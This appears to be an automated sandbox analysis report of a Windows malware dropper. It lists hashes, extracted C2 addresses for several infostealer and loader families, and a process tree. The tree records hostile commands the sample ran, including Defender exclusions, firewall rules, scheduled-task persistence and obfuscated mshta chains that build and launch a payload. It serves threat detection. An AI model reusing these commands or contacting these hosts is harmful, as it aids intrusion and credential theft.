Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    78s
  • max time network
    206s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    09-11-2021 13:19

General

  • Target

    2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe

  • Size

    3.9MB

  • MD5

    e04c606d6936962fe40913b1654410d8

  • SHA1

    37a7a94ea89f4697ad779a43c907deef4fd04f89

  • SHA256

    2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a

  • SHA512

    a98c183a3b9b4cc34544f9cd1ba5ba4a41595ce06d21e0ae2598adc96096411e94a09e3ef72bdc49f7a74b2d58bd7274e041eee2c4d3cee6f2476b3c000c8ba2

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

48.1

Botnet

937

Attributes
  • profile_id

    937

Extracted

Family

xloader

Version

2.5

Campaign

s0iw

C2

http://www.kyiejenner.com/s0iw/

Decoy

ortopediamodelo.com

orimshirts.store

universecatholicweekly.info

yvettechan.com

sersaudavelsempre.online

face-booking.net

europeanretailgroup.com

umofan.com

roemahbajumuslim.online

joyrosecuisine.net

3dmaker.house

megdb.xyz

stereoshopie.info

gv5rm.com

tdc-trust.com

mcglobal.club

choral.works

onlineconsultantgroup.com

friscopaintandbody.com

midwestii.com

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • Vidar Stealer 2 IoCs
  • Xloader Payload 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 13 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe
    "C:\Users\Admin\AppData\Local\Temp\2d63a14e4ab37be8d0eee3d87959e3a0ef972d07411c136ecf2f1ac4191a701a.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3032
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1116
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1204
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sun12c1348d93153.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:944
          • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12c1348d93153.exe
            Sun12c1348d93153.exe
            5⤵
            • Executes dropped EXE
            PID:2224
            • C:\Users\Admin\Pictures\Adobe Films\xFlgB4Za99swS90uhoBEsUeg.exe
              "C:\Users\Admin\Pictures\Adobe Films\xFlgB4Za99swS90uhoBEsUeg.exe"
              6⤵
                PID:2632
              • C:\Users\Admin\Pictures\Adobe Films\KJK03Ni1uFoeb0_VTmHTG6Ou.exe
                "C:\Users\Admin\Pictures\Adobe Films\KJK03Ni1uFoeb0_VTmHTG6Ou.exe"
                6⤵
                  PID:3148
                  • C:\Users\Admin\Documents\o77BvoF8F8H3x9Tfohbo1rNl.exe
                    "C:\Users\Admin\Documents\o77BvoF8F8H3x9Tfohbo1rNl.exe"
                    7⤵
                      PID:5392
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                      7⤵
                      • Creates scheduled task(s)
                      PID:5652
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                      7⤵
                      • Creates scheduled task(s)
                      PID:5644
                  • C:\Users\Admin\Pictures\Adobe Films\yzrfCPgAsCbdOBJe86cBYrEP.exe
                    "C:\Users\Admin\Pictures\Adobe Films\yzrfCPgAsCbdOBJe86cBYrEP.exe"
                    6⤵
                      PID:956
                    • C:\Users\Admin\Pictures\Adobe Films\KFMIiIwz3xbIfB7RnPos0d1z.exe
                      "C:\Users\Admin\Pictures\Adobe Films\KFMIiIwz3xbIfB7RnPos0d1z.exe"
                      6⤵
                        PID:4308
                      • C:\Users\Admin\Pictures\Adobe Films\dUadqlOujg5OCCqRcHGxkRoy.exe
                        "C:\Users\Admin\Pictures\Adobe Films\dUadqlOujg5OCCqRcHGxkRoy.exe"
                        6⤵
                          PID:816
                        • C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe
                          "C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe"
                          6⤵
                            PID:3628
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /im "7erBk_I1otVlnu6TrdtPTtCv.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\7erBk_I1otVlnu6TrdtPTtCv.exe" & exit
                              7⤵
                                PID:5400
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /im "7erBk_I1otVlnu6TrdtPTtCv.exe" /f
                                  8⤵
                                  • Kills process with taskkill
                                  PID:5804
                            • C:\Users\Admin\Pictures\Adobe Films\hCh5SqqQiwpwNGZfbw0Db5l3.exe
                              "C:\Users\Admin\Pictures\Adobe Films\hCh5SqqQiwpwNGZfbw0Db5l3.exe"
                              6⤵
                                PID:1936
                                • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                  7⤵
                                    PID:4672
                                • C:\Users\Admin\Pictures\Adobe Films\TsGYWYHaAmFHKldYAx_XE0KU.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\TsGYWYHaAmFHKldYAx_XE0KU.exe"
                                  6⤵
                                    PID:1508
                                  • C:\Users\Admin\Pictures\Adobe Films\9UwF7RHQbz6ZJ7cgtG3U5ayY.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\9UwF7RHQbz6ZJ7cgtG3U5ayY.exe"
                                    6⤵
                                      PID:4648
                                    • C:\Users\Admin\Pictures\Adobe Films\YV5DwoScdoQ2Kd08qX5SIT_o.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\YV5DwoScdoQ2Kd08qX5SIT_o.exe"
                                      6⤵
                                        PID:4928
                                      • C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\tfugKKePr2LiLXXzD0UhT8At.exe"
                                        6⤵
                                          PID:1100
                                        • C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe"
                                          6⤵
                                            PID:5028
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\RzcTxK6cd9S73eHgTd8njwEX.exe" & exit
                                              7⤵
                                                PID:4668
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 5
                                                  8⤵
                                                  • Delays execution with timeout.exe
                                                  PID:3152
                                            • C:\Users\Admin\Pictures\Adobe Films\6TFHlFY0k4iDobcST87y2qhV.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\6TFHlFY0k4iDobcST87y2qhV.exe"
                                              6⤵
                                                PID:2368
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                  7⤵
                                                    PID:5176
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                    7⤵
                                                      PID:5472
                                                    • C:\Windows\System32\netsh.exe
                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                      7⤵
                                                        PID:5904
                                                      • C:\Windows\System32\netsh.exe
                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                        7⤵
                                                          PID:4572
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:816
                                                        • C:\Windows\System\svchost.exe
                                                          "C:\Windows\System\svchost.exe" formal
                                                          7⤵
                                                            PID:3676
                                                        • C:\Users\Admin\Pictures\Adobe Films\39txMBiTMV_KtjhZXLKp2lXT.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\39txMBiTMV_KtjhZXLKp2lXT.exe"
                                                          6⤵
                                                            PID:1804
                                                            • C:\Users\Admin\AppData\Roaming\Underdress.exe
                                                              C:\Users\Admin\AppData\Roaming\Underdress.exe
                                                              7⤵
                                                                PID:1656
                                                                • C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
                                                                  8⤵
                                                                    PID:5124
                                                                • C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
                                                                  C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
                                                                  7⤵
                                                                    PID:4024
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                      8⤵
                                                                        PID:3952
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4024 -s 552
                                                                        8⤵
                                                                        • Program crash
                                                                        PID:4788
                                                                  • C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"
                                                                    6⤵
                                                                      PID:4324
                                                                      • C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\Xak840eyxFNrItr5jx7GltOy.exe"
                                                                        7⤵
                                                                          PID:5108
                                                                      • C:\Users\Admin\Pictures\Adobe Films\V52hI9Enje6nDetyQrz8AlkB.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\V52hI9Enje6nDetyQrz8AlkB.exe"
                                                                        6⤵
                                                                          PID:2196
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                            7⤵
                                                                              PID:5960
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im chrome.exe
                                                                                8⤵
                                                                                • Kills process with taskkill
                                                                                PID:5328
                                                                          • C:\Users\Admin\Pictures\Adobe Films\6__g9HjU1JzBgP036rXE7gZY.exe
                                                                            "C:\Users\Admin\Pictures\Adobe Films\6__g9HjU1JzBgP036rXE7gZY.exe"
                                                                            6⤵
                                                                              PID:1648
                                                                            • C:\Users\Admin\Pictures\Adobe Films\U8oL3G08uOszHKS5CcuQg0lL.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\U8oL3G08uOszHKS5CcuQg0lL.exe"
                                                                              6⤵
                                                                                PID:3564
                                                                              • C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe
                                                                                "C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"
                                                                                6⤵
                                                                                  PID:2380
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CqMvpdoqCrk5NGJiZvOzLopf.exe"
                                                                                    7⤵
                                                                                      PID:4968
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\OCj5sMmpJYhWjepTLao3GpVf.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\OCj5sMmpJYhWjepTLao3GpVf.exe"
                                                                                    6⤵
                                                                                      PID:4896
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Fdm7g1rYptl81FWmIcNLw9Qv.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Fdm7g1rYptl81FWmIcNLw9Qv.exe"
                                                                                      6⤵
                                                                                        PID:4416
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\v3a5JNV6p_ECxUBimJ0Ek5Y8.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\v3a5JNV6p_ECxUBimJ0Ek5Y8.exe"
                                                                                        6⤵
                                                                                          PID:4784
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"
                                                                                          6⤵
                                                                                            PID:2380
                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                              "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\BZYI0_5bF2pGuSTqquFGslBG.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                              7⤵
                                                                                                PID:5080
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\9_dAShtlgGpWTw7khAQAI2mc.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\9_dAShtlgGpWTw7khAQAI2mc.exe"
                                                                                              6⤵
                                                                                                PID:4620
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\AcOaQgiqgr7WN5oZTcCPb8VM.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\AcOaQgiqgr7WN5oZTcCPb8VM.exe"
                                                                                                6⤵
                                                                                                  PID:776
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Sun1259934706c8.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:980
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun1259934706c8.exe
                                                                                                Sun1259934706c8.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1488
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Sun12d5375519fd3042a.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:1056
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12d5375519fd3042a.exe
                                                                                                Sun12d5375519fd3042a.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:4004
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c Sun12fa00cf9c.exe
                                                                                              4⤵
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2188
                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exe
                                                                                                Sun12fa00cf9c.exe
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2688
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12fa00cf9c.exe
                                                                                                  6⤵
                                                                                                    PID:4008
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Sun12f38be2ba.exe
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1172
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12f38be2ba.exe
                                                                                                  Sun12f38be2ba.exe
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks SCSI registry key(s)
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:3208
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Sun1216aa44861b6.exe /mixone
                                                                                                4⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2992
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun1216aa44861b6.exe
                                                                                                  Sun1216aa44861b6.exe /mixone
                                                                                                  5⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:2816
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 656
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:68
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 672
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:2164
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 772
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:4304
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 808
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:4496
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 752
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:3580
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 908
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:4632
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2816 -s 884
                                                                                                    6⤵
                                                                                                    • Program crash
                                                                                                    PID:4312
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Sun12ae5f6f719fe11fb.exe
                                                                                                4⤵
                                                                                                  PID:1984
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12ae5f6f719fe11fb.exe
                                                                                                    Sun12ae5f6f719fe11fb.exe
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3800
                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                      C:\Windows\system32\WerFault.exe -u -p 3800 -s 1852
                                                                                                      6⤵
                                                                                                      • Program crash
                                                                                                      PID:3716
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun123ea6485e74.exe
                                                                                                  4⤵
                                                                                                    PID:1504
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun123ea6485e74.exe
                                                                                                      Sun123ea6485e74.exe
                                                                                                      5⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:1900
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c Sun120905af9b0.exe
                                                                                                    4⤵
                                                                                                      PID:2120
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe
                                                                                                        Sun120905af9b0.exe
                                                                                                        5⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1316
                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                          "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                          6⤵
                                                                                                            PID:3944
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun120905af9b0.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                              7⤵
                                                                                                                PID:3568
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                  09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                  8⤵
                                                                                                                    PID:3888
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                      9⤵
                                                                                                                        PID:1292
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                          10⤵
                                                                                                                            PID:1016
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                          9⤵
                                                                                                                            PID:4840
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                              10⤵
                                                                                                                                PID:4160
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                  11⤵
                                                                                                                                    PID:4516
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                    11⤵
                                                                                                                                      PID:872
                                                                                                                                    • C:\Windows\SysWOW64\control.exe
                                                                                                                                      control .\R6f7sE.I
                                                                                                                                      11⤵
                                                                                                                                        PID:5052
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                          12⤵
                                                                                                                                            PID:4692
                                                                                                                                            • C:\Windows\system32\RunDll32.exe
                                                                                                                                              C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                              13⤵
                                                                                                                                                PID:1744
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                  14⤵
                                                                                                                                                    PID:4720
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /F -Im "Sun120905af9b0.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:2936
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Sun12da668880c641f.exe
                                                                                                                                4⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1524
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c Sun12e7ce43242.exe
                                                                                                                                4⤵
                                                                                                                                  PID:1512
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 572
                                                                                                                                  4⤵
                                                                                                                                  • Program crash
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:3792
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12da668880c641f.exe
                                                                                                                            Sun12da668880c641f.exe
                                                                                                                            1⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3056
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                              2⤵
                                                                                                                                PID:4820
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                  3⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:3464
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS46AB9B96\Sun12e7ce43242.exe
                                                                                                                              Sun12e7ce43242.exe
                                                                                                                              1⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:1144
                                                                                                                            • C:\Windows\system32\rundll32.exe
